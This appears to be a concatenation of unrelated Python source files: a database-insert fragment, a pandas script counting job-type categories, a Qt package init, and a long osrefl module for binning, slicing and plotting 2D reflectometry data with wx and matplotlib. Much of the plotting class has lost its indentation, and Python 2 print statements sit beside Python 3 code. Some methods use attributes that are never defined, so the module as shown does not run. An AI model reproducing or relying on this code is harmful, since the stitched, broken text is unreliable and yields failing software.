    mycursor.execute(sql,val)
    db.commit()
    print(mycursor.rowcount, "record inserted.")
def work2():
    """Entry-point wrapper: run the full two-feed counting pipeline."""
    main()
|
import pandas as pd
import numpy as np
import seaborn as sns
from pandas import ExcelWriter
import will as w
df_stint = pd.read_pickle("stint.txt")
#df_business = pd.read_pickle("business.txt")
#df_review = pd.read_pickle("review.txt")
#df_student = pd.read_pickle("student.txt")
#df_studentavailability = pd.read_pickle("studentavailability.txt")
#df_university = pd.read_pickle("university.txt")
def count_works(type):
    """Count stints whose 'type' column matches *type* (case-insensitive regex)."""
    matches = df_stint['type'].str.contains('{}'.format(type), regex=True, case=False)
    return np.sum(matches)
def create_series_of(series, type):
    """Return the entries of *series* matching *type* (case-insensitive
    regex); NaN entries are excluded (NaN == True is False)."""
    mask = series.str.contains('{}'.format(type), regex=True, case=False) == True
    return series[mask]
def get_list_of_works(series, type):
    """Distinct values of *series* matching *type*, as a list."""
    matching = create_series_of(series, type)
    return matching.drop_duplicates().tolist()
def delete_from_series(series, list):
    """Return *series* without the values in *list*; NaNs are dropped."""
    keep = ~series.isin(list)
    return series[keep].dropna()
def flatten(list):
    """Flatten one level of nesting: [[a, b], [c]] -> [a, b, c].

    The parameter keeps its original (builtin-shadowing) name for
    backward compatibility with keyword callers.
    """
    # Comprehension replaces the original manual nested append loop.
    return [item for sublist in list for item in sublist]
def save_to_excel(df, name):
    """Write *df* to '<name>.xlsx'.

    Uses ExcelWriter as a context manager so the file is closed even on
    error; the original's explicit writer.save() is deprecated/removed
    in modern pandas.
    """
    with pd.ExcelWriter('{}.xlsx'.format(name)) as writer:
        df.to_excel(writer)
# Categorise stint job types: for each keyword, collect the distinct
# matching type strings, then remove them from the working series so
# later keywords do not re-match the same entries.
list_of_works = []
my_series = df_stint['type']
keywords = ['wait', 'run', 'bar', 'cust', 'kitch', 'leaf', 'cloak',
            'cashier', 'host', 'clean', 'stock', 'door', 'other', 'errand',
            'deliv', 'chef', 'proof', 'assis']
for word in keywords:
    list_of_works.append(get_list_of_works(my_series, '{}'.format(word)))
    #print(list_of_works[keywords.index(word)])
    my_series = delete_from_series(my_series, list_of_works[keywords.index(word)])
# Whatever remains is uncategorised; show its frequency table.
print(my_series.value_counts())
#print(my_series.shape[0])
#print(list((2,2)))
w.iter_loop() |
#!/usr/bin/env python
"""Custom Qt Widgets."""
from __future__ import division, print_function
from .playmat import PlayMat
from .viewer import Viewer
# BUG FIX: the class imported above is "PlayMat" (capital M); the old
# entry "Playmat" did not exist, breaking `from <package> import *`.
__all__ = ["PlayMat", "Viewer"]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# check to see if all parameters are set on the command line
# if they are, then don't open GUI interface
from math import *
import sys
#from Tkinter import *
#import tkMessageBox
#import tkFileDialog
#from FileDialog import *
from osrefl.loaders.reduction import *
import osrefl.loaders.reduction as red
from numpy import *
from pylab import imshow,cm,colorbar,hot,show,xlabel,ylabel,connect, plot, figure, draw, axis, gcf
import matplotlib.colors as colors
from matplotlib.widgets import RectangleSelector
from osrefl.viewers.colormap import change_colormap
from matplotlib.axis import XAxis, YAxis
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as Canvas
from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg
import wx
import pickle
from matplotlib.image import FigureImage
from matplotlib.figure import Figure
from osrefl.viewers.zoom_colorbar import zoom_colorbar
from .reduction.cmapmenu import CMapMenu
from matplotlib.cm import get_cmap
import matplotlib.cbook as cbook
import matplotlib
from osrefl.viewers.plot_2d import plot_2d_data
from scipy import ndimage
def load_plottable_2d_data(filename=None):
    """Load a pickled p2d_initialization and return the instantiated
    plottable_2d_data.

    When *filename* is None, a wx file-open dialog asks the user for the
    file; if the dialog is cancelled, None is returned (the original
    crashed on pickle.load(None)).

    WARNING: pickle deserialization executes arbitrary code -- only load
    trusted files.
    """
    if filename is None:
        dlg = wx.FileDialog(None, "Load plottable_2d_data object from file:", '', "", "*.*", style=wx.FD_OPEN)
        if dlg.ShowModal() == wx.ID_OK:
            fn = dlg.GetFilename()
            fd = dlg.GetDirectory()
            dlg.Destroy()
            filename = fd + '/' + fn
        else:
            dlg.Destroy()
            return None
    # BUG FIX: pickle.load expects an open binary file object, not a
    # path string.
    with open(filename, 'rb') as fileobj:
        initobj = pickle.load(fileobj)
    return initobj.instantiate()
def save_plottable_2d_data(obj, filename):
    """Persist *obj* to *filename* via the object's own save_to_file."""
    obj.save_to_file(filename)
class p2d_initialization:
    """stores necessary data to recreate a plottable_2d_data object, for pickling"""
    def __init__(self, bin_data = None, params=None, creator=None, supervisor=None, plot_data=None, title=''):
        self.bin_data = bin_data
        self.params = params
        self.creator = creator
        self.supervisor = supervisor
        self.plot_data = plot_data
        self.title = title
    def instantiate(self):
        """Rebuild the live plottable_2d_data from the stored state."""
        return plottable_2d_data(self.bin_data, self.params, self.creator, self.supervisor, self.plot_data, self.title)
class plottable_2d_data:
""" container class, for holding an array of 2d data
with normalization and pixel count data
bin_data[:,:,0] = intensity
bin_data[:,:,1] = pixels in bin
bin_data[:,:,2] = monitor count
bin_data[:,:,3] = average (intensity over total monitor count)
also holds a dictionary of parameters with range boundaries and
dimensions.
Includes a plot method that shows a 2D log-intensity plot
with correct axes
Math methods rely on binning being the same for compared data
"""
def __init__(self,
bin_data,
params_in={},
creator = None,
supervisor = None,
plot_data = True,
title = '',
base_data_obj = None,
**kwargs):
#self.param_label = [ 'ymin', 'ymax', 'ysteps', 'xmin', 'xmax', 'xsteps' ]
self.creator = creator # calling object
self.params = params_in
self.show_sliceplots = True #default = on
self.bin_data = bin_data
self.plot_data = plot_data
# bin_data[:,:,0] = raw intensity (summed)
# bin_data[:,:,1] = raw pixels in the bin
# bin_data[:,:,2] = normalization (monitor or time, summed)
# bin_data[:,:,3] = avg. intensity (raw intensity / normalization)
self.data_array = []
self.fig = None
self.slice_y_data = None
self.slice_x_data = None
self.plot = None
self.title = title
self.supervisor = supervisor
self.base_data_obj = base_data_obj
if supervisor:
self.register(supervisor)
#self.xaxis_units = xaxis_units
#self.yaxis_units = yaxis_units
    def __getstate__(self):
        """Pickle only data, params, plot flag and title (drop wx/supervisor refs)."""
        return (self.bin_data, self.params, self.plot_data, self.title)
    def __setstate__(self, state):
        """Restore the (bin_data, params, plot_data, title) tuple written by __getstate__."""
        self.bin_data, self.params, self.plot_data, self.title = state
    def register(self, supervisor):
        """Register this dataset with *supervisor* and remember the handle."""
        supervisor.AddPlottable2dData(self, name = self.title, base_data_obj = self.base_data_obj)
        #self.number = supervisor.plottable_count
        self.supervisor = supervisor
def __del__(self):
if self.area_plot:
self.area_plot.Close()
def copy(self):
new_data = plottable_2d_data(self.bin_data.copy(), self.params, supervisor = self.supervisor, title = self.title)
return new_data
def save_to_file(self, filename = None):
if filename == None:
dlg = wx.FileDialog(None, "Save plottable_2d_data object to file:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
filename = fd + '/' + fn
initobj = p2d_initialization(self.bin_data, self.params, self.creator, self.supervisor, self.plot_data, self.title)
stored_file = open(filename, 'wb')
pickle.dump(initobj, stored_file)
def save2(self, filename = None):
if filename == None:
dlg = wx.FileDialog(None, "Save plottable_2d_data object to file:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
filename = fd + '/' + fn
stored_file = open(filename, 'wb')
pickle.dump(self, stored_file)
stored_file.close()
def __sub__(self, other_data):
if type(other_data) == type(self):
return self.__subtract_otherdataset(other_data)
elif isscalar(other_data):
return self.__subtract_scalar(other_data)
def __subtract_scalar(self, other_data):
new_data = plottable_2d_data(zeros(self.bin_data.shape), self.params, supervisor = self.supervisor, title = '('+self.title+') - ('+str(other_data)+')')
new_data.bin_data = self.bin_data.copy()
new_data.bin_data[:,:,3] -= other_data
return new_data
def __subtract_otherdataset(self, other_data):
if other_data.bin_data.shape == self.bin_data.shape:
if self.check_compatible_binning(other_data):
new_data = plottable_2d_data(zeros(self.bin_data.shape), self.params, supervisor = self.supervisor, title = '('+self.title+') - ('+other_data.title+')')
self_nonzero = (self.bin_data[:,:,1] != 0)
other_nonzero = (other_data.bin_data[:,:,1] != 0)
mask = self_nonzero * other_nonzero
print len(mask)
new_data.bin_data[:,:,3][mask] = self.bin_data[:,:,3][mask] - other_data.bin_data[:,:,3][mask]
new_data.bin_data[:,:,2][mask] = self.bin_data[:,:,2][mask] + other_data.bin_data[:,:,2][mask]
new_data.bin_data[:,:,1][mask] = self.bin_data[:,:,1][mask] + other_data.bin_data[:,:,1][mask]
new_data.bin_data[:,:,0][mask] = self.bin_data[:,:,0][mask] - other_data.bin_data[:,:,0][mask]
return new_data
else:
print("error: datasets are not identically binned")
elif other_data.bin_data.shape[1] == 1:
new_data = plottable_2d_data(zeros(self.bin_data.shape), self.params, supervisor = self.supervisor, title = '('+self.title+') - ('+other_data.title+')')
new_data.bin_data[:,:,0] = self.bin_data[:,:,0] - other_data.bin_data[:,:,0]
new_data.bin_data[:,:,1] = self.bin_data[:,:,1] + other_data.bin_data[:,:,1]
new_data.bin_data[:,:,2] = self.bin_data[:,:,2] + other_data.bin_data[:,:,2]
new_data.bin_data[:,:,3] = self.bin_data[:,:,3] - other_data.bin_data[:,:,3]
return new_data
else:
print("subtraction failed for some reason")
def check_compatible_binning(self, other_data):
compatible = ( other_data.__class__.__name__ == self.__class__.__name__ )
compatible &= ( other_data.params['y_steps'] == self.params['y_steps'] )
compatible &= ( other_data.params['x_steps'] == self.params['x_steps'] )
compatible &= ( other_data.params['x_min'] == self.params['x_min'] )
compatible &= ( other_data.params['y_min'] == self.params['y_min'] )
compatible &= ( other_data.params['x_max'] == self.params['x_max'] )
compatible &= ( other_data.params['y_max'] == self.params['y_max'] )
### compatibility shouldn't depend on unit labels for axes, but uncomment if you want it to.
#compatible &= ( other_data.params['x_units'] == self.params['x_units'] )
#compatible &= ( other_data.params['y_units'] == self.params['y_units'] )
return compatible
def __add__(self, other_data):
if type(other_data) == type(self):
print 'adding two data sets \n'
return self.__add_otherdataset(other_data)
elif isscalar(other_data):
print 'adding scalar to data set\n'
return self.__add_scalar(other_data)
def __add_scalar(self, other_data):
new_data = self.copy()
new_data.bin_data[:,:,3] += other_data
return new_data
def __add_otherdataset(self, other_data):
if self.check_compatible_binning(other_data):
new_data = plottable_2d_data(self.bin_data, self.params, supervisor = self.supervisor, title = '('+self.title+') + ('+other_data.title+')')
new_data.bin_data = self.bin_data + other_data.bin_data
#new_data.bin_data = self.bin_data.copy()
#for j in range(self.params['y_steps']):
#for i in range(self.params['x_steps']):
#new_data.bin_data[i,j,0] = self.bin_data[i,j,0] + other_data.bin_data[i,j,0]
#new_data.bin_data[i,j,1] = self.bin_data[i,j,1] + other_data.bin_data[i,j,1]
#new_data.bin_data[i,j,2] = self.bin_data[i,j,2] + other_data.bin_data[i,j,2]
#new_data.bin_data[i,j,3] = self.bin_data[i,j,3] + other_data.bin_data[i,j,3]
return new_data
else:
print("error: datasets are not identically binned")
return
    def __mul__(self, multiplier):
        """Scale the raw intensity by *multiplier* and recompute per-bin averages.

        Pixel and monitor counts are copied unchanged; empty bins get an
        average of 0.0.
        """
        multiplier = float(multiplier)
        new_data = plottable_2d_data(self.bin_data, self.params, supervisor = self.supervisor, title = '('+self.title+') * ' + str(multiplier))
        new_data.bin_data = self.bin_data.copy()
        for j in range(self.params['y_steps']):
            for i in range(self.params['x_steps']):
                new_data.bin_data[i,j,0] = self.bin_data[i,j,0] * multiplier
                new_data.bin_data[i,j,1] = self.bin_data[i,j,1]
                new_data.bin_data[i,j,2] = self.bin_data[i,j,2]
                new_pixelCount = new_data.bin_data[i,j,1]
                if ( new_pixelCount > 0 ):
                    new_monitorTotal = new_data.bin_data[i,j,2]
                    # average = scaled raw intensity / monitor count
                    new_avg = new_data.bin_data[i,j,0] / double(new_monitorTotal)
                else:
                    new_avg = 0.0
                new_data.bin_data[i,j,3] = new_avg
        return new_data
#def __div__(self, other_data):
#"""divide one dataset by another - useful for
#dividing by a background, for instance"""
#if not self.check_compatible_binning(other_data):
#print("error: datasets are not identically binned")
#return self
#if not other_data.bin_data[self.bin_data[:,:,0] != 0].min() > 0:
## checking for denominator positive for all data points
#print("error: attempting to divide by zero")
#return self
#else:
#new_data = plottable_2d_data(self.bin_data, self.params)
#new_data.bin_data = self.bin_data.copy()
#for j in range(self.params['y_steps']):
#for i in range(self.params['x_steps']):
#new_data.bin_data[i,j,0] = self.bin_data[i,j,0] / other_data.bin_data[i,j,0]
#new_data.bin_data[i,j,1] = self.bin_data[i,j,1]
#new_data.bin_data[i,j,2] = self.bin_data[i,j,2]
#new_pixelCount = new_data.bin_data[i,j,1]
#if ( new_pixelCount > 0 ):
#new_monitorTotal = new_data.bin_data[i,j,2]
#new_avg = new_data.bin_data[i,j,0] / double(new_monitorTotal)
#else:
#new_avg = 0.0
#new_data.bin_data[i,j,3] = new_avg
#return new_data
    def __div__(self, other_data):
        """divide one dataset by another - useful for
        dividing by a background, for instance"""
        # NOTE: __div__ is the Python 2 protocol method; Python 3 would
        # need __truediv__ for the / operator.
        if not self.check_compatible_binning(other_data):
            print("error: datasets are not identically binned")
            return self
        # denominator must be strictly positive wherever this dataset has data
        if not other_data.bin_data[:,:,3][self.bin_data[:,:,1] != 0].min() > 0:
            # checking for denominator positive for all data points
            print("error: attempting to divide by zero")
            return self
        else:
            new_data = self.copy()
            new_data.bin_data *= 0
            # only bins populated in BOTH datasets are filled in the result
            self_nonzero = (self.bin_data[:,:,1] != 0)
            other_nonzero = (other_data.bin_data[:,:,1] != 0)
            mask = self_nonzero * other_nonzero
            # averages divide; counts (raw, pixel, monitor) are summed
            new_data.bin_data[:,:,3][mask] = self.bin_data[:,:,3][mask] / other_data.bin_data[:,:,3][mask]
            new_data.bin_data[:,:,1][mask] = self.bin_data[:,:,1][mask] + other_data.bin_data[:,:,1][mask]
            new_data.bin_data[:,:,2][mask] = self.bin_data[:,:,2][mask] + other_data.bin_data[:,:,2][mask]
            new_data.bin_data[:,:,0][mask] = self.bin_data[:,:,0][mask] + other_data.bin_data[:,:,0][mask]
            return new_data
def overlap(self, other_data):
new_data = self.copy()
mask = (other_data.bin_data[:,:,1] == 0)
new_data.bin_data[:,:,0][mask] = 0
new_data.bin_data[:,:,1][mask] = 0
new_data.bin_data[:,:,2][mask] = 0
new_data.bin_data[:,:,3][mask] = 0
return new_data
def smooth(self, smoothing_width = 3.0, axis = 1):
working_copy = self.bin_data.copy()
nz_mask = working_copy[:,:,1].nonzero()
working_copy[:,:,0] = ndimage.gaussian_filter1d(working_copy[:,:,0], smoothing_width, axis=axis)
working_copy[:,:,3][nz_mask] = working_copy[:,:,0][nz_mask] / working_copy[:,:,2][nz_mask]
self.bin_data = working_copy
if self.area_plot:
self.area_plot.Destroy()
self.area_plot = self.wxplot()
def save(self, outFileName = None):
if outFileName == None:
dlg = wx.FileDialog(None, "Save 2d data as:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
outFileName = fd + '/' + fn
outFile = open(outFileName, 'w')
# write header: parameter list, then column headers, then data.
outFile.write("#" + str(self.params) + "\n")
outFile.write("x\ty\tI/monitor\tI_0\n")
y_max = self.params['y_max']
y_min = self.params['y_min']
y_steps = self.params['y_steps']
y_units = self.params['y_units']
x_max = self.params['x_max']
x_min = self.params['x_min']
x_steps = self.params['x_steps']
x_units = self.params['x_units']
xStepSize = ( y_max - y_min ) / y_steps
yStepSize = ( x_max - x_min ) / x_steps
yArray = arange(y_steps, dtype='float') / y_steps * (y_max - y_min) + y_min
xArray = arange(x_steps, dtype='float') / x_steps * (x_max - x_min) + x_min
for i in range(x_steps):
for j in range(y_steps):
x = xArray[i]
y = yArray[j]
I_0 = self.bin_data[i,j,0]
avg = self.bin_data[i,j,3]
outFile.write(str(x) + "\t" + str(y) + "\t")
if ( avg > 0.0 ):
outFile.write(str(avg) + "\t" + str(I_0))
else:
outFile.write('-0\t-0')
outFile.write('\n')
outFile.close()
return
def onselect(self, eclick, erelease):
x_range = [eclick.xdata, erelease.xdata]
y_range = [eclick.ydata, erelease.ydata]
ax = eclick.inaxes
self.sliceplot(x_range, y_range, ax=ax)
print 'sliceplot([%f,%f],[%f,%f])' % (x_range[0],x_range[1],y_range[0],y_range[1])
def sliceplot(self, x_range, y_range, ax = None):
"""sum along x and z within the box defined by qX- and qZrange.
sum along qx is plotted to the right of the data,
sum along qz is plotted below the data.
Transparent white rectangle is overlaid on data to show summing region"""
x, slice_y_data, y, slice_x_data = self.do_xy_slice(x_range, y_range)
self.x = x
self.slice_y_data = slice_y_data
self.y = y
self.slice_x_data = slice_x_data
self.slice_xrange = x_range
self.slice_yrange = y_range
if self.area_plot:
self.area_plot.show_slice_overlay(x_range, y_range, x, slice_y_data, y, slice_x_data)
    def do_xy_slice(self, x_range, y_range):
        """ slice up the data, once along x and once along z.
        returns 4 arrays: a y-axis for the x data,
        an x-axis for the y data."""
        params = self.params
        print 'doing xy slice'
        data = self.bin_data[:,:,3].copy()
        pixels = self.bin_data[:,:,1]
        # zero out any pixels in the sum that have zero in the pixel count:
        data[pixels == 0] = 0
        # normalization counts how many populated bins contribute to each sum
        normalization_matrix = ones(pixels.shape)
        normalization_matrix[pixels == 0] = 0
        x_min = min(x_range)
        x_max = max(x_range)
        y_min = min(y_range)
        y_max = max(y_range)
        x_size,y_size = data.shape
        global_x_range = (params['x_max'] - params['x_min'])
        global_y_range = (params['y_max'] - params['y_min'])
        # convert the requested data-coordinate box to pixel indices
        x_pixel_min = round( (x_min - params['x_min']) / global_x_range * x_size )
        x_pixel_max = round( (x_max - params['x_min']) / global_x_range * x_size )
        y_pixel_min = round( (y_min - params['y_min']) / global_y_range * y_size )
        y_pixel_max = round( (y_max - params['y_min']) / global_y_range * y_size )
        #correct any sign switches:
        if (x_pixel_min > x_pixel_max):
            new_min = x_pixel_max
            x_pixel_max = x_pixel_min
            x_pixel_min = new_min
        if (y_pixel_min > y_pixel_max):
            new_min = y_pixel_max
            y_pixel_max = y_pixel_min
            y_pixel_min = new_min
        # snap the box back to data coordinates at exact pixel boundaries
        new_x_min = x_pixel_min / x_size * global_x_range + params['x_min']
        new_x_max = x_pixel_max / x_size * global_x_range + params['x_min']
        new_y_min = y_pixel_min / y_size * global_y_range + params['y_min']
        new_y_max = y_pixel_max / y_size * global_y_range + params['y_min']
        x_pixel_min = int(x_pixel_min)
        x_pixel_max = int(x_pixel_max)
        y_pixel_min = int(y_pixel_min)
        y_pixel_max = int(y_pixel_max)
        y_norm_factor = sum(normalization_matrix[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=1)
        x_norm_factor = sum(normalization_matrix[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=0)
        # make sure the normalization has a minimum value of 1 everywhere,
        # to avoid divide by zero errors:
        y_norm_factor[y_norm_factor == 0] = 1
        x_norm_factor[x_norm_factor == 0] = 1
        # per-row / per-column averages over populated bins only
        slice_y_data = sum(data[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=1) / y_norm_factor
        slice_x_data = sum(data[x_pixel_min:x_pixel_max,y_pixel_min:y_pixel_max], axis=0) / x_norm_factor
        # axis values at the lower edge of each sliced bin
        x_vals = arange(slice_y_data.shape[0], dtype = 'float') / slice_y_data.shape[0] * (new_x_max - new_x_min) + new_x_min
        y_vals = arange(slice_x_data.shape[0], dtype = 'float') / slice_x_data.shape[0] * (new_y_max - new_y_min) + new_y_min
        return x_vals, slice_y_data, y_vals, slice_x_data
def log_lin_select(self,event):
if not (isinstance(event.artist, XAxis) or isinstance(event.artist, YAxis)):
return
ax = event.artist.axes
label = ax.get_label()
if label == 'sz':
scale = ax.get_yscale()
if scale == 'log':
ax.set_yscale('linear')
ax.figure.canvas.draw()
elif scale == 'linear':
ax.set_yscale('log')
ax.figure.canvas.draw()
elif label == 'sx':
scale = ax.get_xscale()
if scale == 'log':
ax.set_xscale('linear')
ax.figure.canvas.draw()
elif scale == 'linear':
ax.set_xscale('log')
ax.figure.canvas.draw()
return
def toggle_selector(self, event):
print ' Key pressed.'
if event.key in ['C', 'c']:
print 'change colormap.'
ax = event.inaxes
change_colormap(ax.images[0])
if event.key in ['Q', 'q'] and self.RS.active:
print ' RectangleSelector deactivated.'
self.RS.set_active(False)
if event.key in ['A', 'a'] and not self.RS.active:
print ' RectangleSelector activated.'
self.RS.set_active(True)
def save_slice(self, outFileName, header = ""):
outFile = open(outFileName, 'w')
outFile.write(header)
if not (self.slice_qx_data == None):
for i in range(self.slice_qx_data.shape[0]):
x = self.qz_vals[i]
y = self.slice_qx_data[i]
outFile.write(str(x) + "\t" + str(y) + "\n")
outFile.close()
print('saved qx slice in %s' % (outFileName))
return
def save_x_slice(self, event=None, outFileName=None):
if outFileName == None:
dlg = wx.FileDialog(None, "Save 2d data as:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
outFileName = fd + '/' + fn
outFile = open(outFileName, 'w')
outFile.write('#'+self.title+'\n')
outFile.write('#xmin: ' + str(self.slice_xrange[0]) + '\n')
outFile.write('#xmax: ' + str(self.slice_xrange[1]) + '\n')
outFile.write('#ymin: ' + str(self.slice_yrange[0]) + '\n')
outFile.write('#ymax: ' + str(self.slice_yrange[1]) + '\n')
outFile.write("#y\tslice_x_data\n")
if not (self.slice_x_data == None):
for i in range(self.slice_x_data.shape[0]):
x = self.y[i]
y = self.slice_x_data[i]
outFile.write(str(x) + "\t" + str(y) + "\n")
outFile.close()
print('saved x slice in %s' % (outFileName))
return
def save_y_slice(self, event=None, outFileName=None):
if outFileName == None:
dlg = wx.FileDialog(None, "Save 2d data as:", '', "", "", wx.FD_SAVE)
if dlg.ShowModal() == wx.ID_OK:
fn = dlg.GetFilename()
fd = dlg.GetDirectory()
dlg.Destroy()
outFileName = fd + '/' + fn
outFile = open(outFileName, 'w')
outFile.write('#'+self.title+'\n')
outFile.write('#xmin: ' + str(self.slice_xrange[0]) + '\n')
outFile.write('#xmax: ' + str(self.slice_xrange[1]) + '\n')
outFile.write('#ymin: ' + str(self.slice_yrange[0]) + '\n')
outFile.write('#ymax: ' + str(self.slice_yrange[1]) + '\n')
outFile.write("#x\tslice_y_data\n")
if not (self.slice_y_data == None):
for i in range(self.slice_y_data.shape[0]):
x = self.x[i]
y = self.slice_y_data[i]
outFile.write(str(x) + "\t" + str(y) + "\n")
outFile.close()
print('saved y slice in %s' % (outFileName))
return
    def plot_qx_slice(self, label = '', figNum = None):
        """Plot the stored qx slice against qz on figure *figNum* (a new
        figure when None)."""
        # NOTE(review): qz_vals / slice_qx_data are not assigned anywhere in
        # this class; presumably filled in by an external caller -- confirm.
        if figNum:
            fig = figure(figNum)
        else:
            fig = figure()
            figNum = fig.number
        plot(self.qz_vals, self.slice_qx_data, label = label)
        return
    def plot_qz_slice(self, label = '', figNum = None):
        """Plot the stored qz slice against qx on figure *figNum* (a new
        figure when None)."""
        # NOTE(review): qx_vals / slice_qz_data are not assigned anywhere in
        # this class; presumably filled in by an external caller -- confirm.
        if figNum:
            fig = figure(figNum)
        else:
            fig = figure()
            figNum = fig.number
        plot(self.qx_vals, self.slice_qz_data, label = label)
        return
def logplot(self, show_sliceplots=True):
from zoom_colorbar import zoom_colorbar
x_min = self.params['x_min']
x_max = self.params['x_max']
y_min = self.params['y_min']
y_max = self.params['y_max']
self.show_data = zeros((self.params['x_steps'],self.params['y_steps']))
self.minimum_intensity = inf
for j in range(self.params['y_steps']):
for i in range(self.params['x_steps']):
avg = self.bin_data[i,j,3]
if avg > 0.0:
self.show_data[i,j] = avg
else:
self.show_data[i,j] = 0.0
if (avg < self.minimum_intensity and avg > 0):
self.minimum_intensity = avg
#self.show_data = transpose(log(self.show_data + self.minimum_intensity / 2.0))
fig = figure()
self.fig = fig
connect('pick_event', self.log_lin_select)
if show_sliceplots:
ax = fig.add_subplot(221, label='qxqz_plot')
fig.sx = fig.add_subplot(222, label='sx', picker=True)
fig.sx.xaxis.set_picker(True)
fig.sx.yaxis.set_picker(True)
fig.sz = fig.add_subplot(223, label='sz', picker=True)
fig.sz.xaxis.set_picker(True)
fig.sz.yaxis.set_picker(True)
self.RS = RectangleSelector(ax, self.onselect, drawtype='box', useblit=True)
fig.slice_overlay = None
else:
ax = fig.add_subplot(111, label='qxqz_plot')
fig.ax = ax
ax.set_title(self.params['description'])
connect('key_press_event', self.toggle_selector)
transformed_show_data = transpose(log(self.show_data + self.minimum_intensity / 2.0))
im = ax.imshow(transformed_show_data, interpolation='nearest', aspect='auto', origin='lower',cmap=cm.jet, extent=(x_min,x_max,y_min,y_max))
fig.im = im
ax.set_xlabel(self.xlabel)
ax.set_ylabel(self.ylabel)
zoom_colorbar(im)
figure(fig.number)
fig.canvas.draw()
return im
def plot(self, show_sliceplots=True):
from zoom_colorbar import zoom_colorbar
x_min = self.params['x_min']
x_max = self.params['x_max']
y_min = self.params['y_min']
y_max = self.params['y_max']
self.show_data = zeros((self.params['x_steps'],self.params['y_steps']))
self.minimum_intensity = inf
for j in range(self.params['y_steps']):
for i in range(self.params['x_steps']):
avg = self.bin_data[i,j,3]
self.show_data[i,j] = avg
if (avg < self.minimum_intensity and avg > 0):
self.minimum_intensity = avg
fig = figure()
self.fig = fig
connect('pick_event', self.log_lin_select)
if show_sliceplots:
ax = fig.add_subplot(221, label='qxqz_plot')
fig.sx = fig.add_subplot(222, label='sx', picker=True)
fig.sx.xaxis.set_picker(True)
fig.sx.yaxis.set_picker(True)
fig.sz = fig.add_subplot(223, label='sz', picker=True)
fig.sz.xaxis.set_picker(True)
fig.sz.yaxis.set_picker(True)
self.RS = RectangleSelector(ax, self.onselect, drawtype='box', useblit=True)
fig.slice_overlay = None
else:
ax = fig.add_subplot(111, label='qxqz_plot')
fig.ax = ax
ax.set_title(self.params['description'])
connect('key_press_event', self.toggle_selector)
transformed_show_data = transpose(self.show_data)
im = ax.imshow(transformed_show_data, interpolation='nearest', aspect='auto', origin='lower',cmap=cm.hot, extent=(x_min,x_max,y_min,y_max))
fig.im = im
ax.set_xlabel('Qx (inv Angstroms)')
ax.set_ylabel('Qz (inv Angstroms)')
#fig.colorbar(im, ax=ax)
zoom_colorbar(im)
#im.set_cmap(cm.hot)
#fig.show()
figure(fig.number)
draw()
return im
    def wxplot(self, destroy_older = True, scale = 'log'):
        """Open the averaged data in a custom wx frame (toolbar with slice
        button); the frame is returned and stored on self.area_plot."""
        #use the custom WX Frame defined below, with custom toolbar including slice button
        # NOTE(review): destroy_older is accepted but never used -- confirm.
        x_min = self.params['x_min']
        x_max = self.params['x_max']
        y_min = self.params['y_min']
        y_max = self.params['y_max']
        self.show_data = self.bin_data[:,:,3].copy()
        pixel_mask = self.bin_data[:,:,1].copy()
        extent=[x_min,x_max,y_min,y_max]
        #from plot_2d3 import plot_2d_data
        plot_title = self.params['description']
        x_label = self.params['x_units']
        y_label = self.params['y_units']
        frame = offspec_plot_2d_data(self.show_data, extent, self, scale = scale, pixel_mask = pixel_mask, window_title = self.title, plot_title = plot_title, x_label = x_label, y_label = y_label)
        frame.Show()
        self.area_plot = frame
        return frame
class offspec_plot_2d_data(plot_2d_data):
"""overriding the context menus to add interaction with other objects known to supervisor"""
def get_all_plot_2d_instances(self):
"""get all other plots that are open (from supervisor?)"""
if self.caller == None:
return [], []
supervisor = self.caller.supervisor
instances = []
instance_names = []
#for dataset in supervisor.rebinned_data_objects:
##instances.append(dataset)
#for subkey in dataset.__dict__.keys():
#if isinstance(dataset.__dict__[subkey], plottable_2d_data):
##print('plottable_2d_data yes')
#instance_names.append(str(dataset.number) + ': ' + subkey + ': ' + dataset.description)
#instances.append(dataset.__dict__[subkey])
for plottable in supervisor.plottable_2d_data_objects:
if hasattr(plottable, 'area_plot'):
instances.append(plottable.area_plot)
instance_names.append(plottable.title + ': ' + plottable.params['description'])
return instances, instance_names
    def other_plots_menu(self):
        """Build a wx.Menu listing the other open 2d plots.

        Note: no handlers are bound to the items here; callers are expected
        to bind them.
        """
        other_plots, other_plot_names = self.get_all_plot_2d_instances()
        other_menu = wx.Menu()
        for op in other_plot_names:
            item = other_menu.Append(wx.ID_ANY, op, op)
        return other_menu
def other_plots_dialog(self):
other_plots, other_plot_names = self.get_all_plot_2d_instances()
#selection_num = wx.GetSingleChoiceIndex('Choose other plot', '', other_plot_names)
dlg = wx.SingleChoiceDialog(None, 'Choose other plot', '', other_plot_names)
dlg.SetSize(wx.Size(640,480))
if dlg.ShowModal() == wx.ID_OK:
selection_num=dlg.GetSelection()
dlg.Destroy()
return other_plots[selection_num]
def dummy(self, evt):
print 'the event is: ' + str(evt)
    def area_context(self, mpl_mouseevent, evt):
        """Right-click context menu for the plot area: grid toggle, log/lin
        toggle, colormap submenu, and copy-from-other-plot actions."""
        area_popup = wx.Menu()
        item1 = area_popup.Append(wx.ID_ANY,'&Grid on/off', 'Toggle grid lines')
        wx.EVT_MENU(self, item1.GetId(), self.OnGridToggle)
        cmapmenu = CMapMenu(self, callback = self.OnColormap, mapper=self.mapper, canvas=self.canvas)
        item2 = area_popup.Append(wx.ID_ANY,'&Toggle log/lin', 'Toggle log/linear scale')
        # the lambda captures the matplotlib event so the handler knows
        # which axes were clicked
        wx.EVT_MENU(self, item2.GetId(), lambda evt: self.toggle_log_lin(mpl_mouseevent))
        item3 = area_popup.AppendMenu(wx.ID_ANY, "Colourmaps", cmapmenu)
